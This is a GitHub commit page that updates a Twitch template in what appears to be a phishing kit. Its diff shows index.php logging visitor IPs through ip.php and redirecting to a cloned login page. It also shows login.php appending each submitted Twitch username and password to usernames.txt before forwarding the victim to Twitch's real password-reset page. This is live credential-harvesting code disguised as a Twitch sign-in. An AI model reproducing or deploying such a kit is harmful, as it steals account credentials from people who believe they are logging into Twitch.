Skip to content

Commit 26ee43a

Browse files
committed
Updated Page: twitch
1 parent badabc5 commit 26ee43a

File tree

5 files changed

+3283
-65
lines changed

5 files changed

+3283
-65
lines changed

.sites/twitch/favicon.png

382 Bytes
Loading

.sites/twitch/index.php

+1-1
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
<?php
22
include 'ip.php';
3-
header('Location: user.php');
3+
header('Location: login.html');
44
exit
55
?>

.sites/twitch/login.html

+3,281
Large diffs are not rendered by default.

.sites/twitch/login.php

+1-1
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
<?php
22

3-
file_put_contents("usernames.txt", "Twitch Username: " . $_POST['Username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
3+
file_put_contents("usernames.txt", "Twitch Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
44
header('Location: https://passport.twitch.tv/password_resets/new?');
55
exit();
66
?>

.sites/twitch/user.php

-63
This file was deleted.

0 commit comments

Comments
 (0)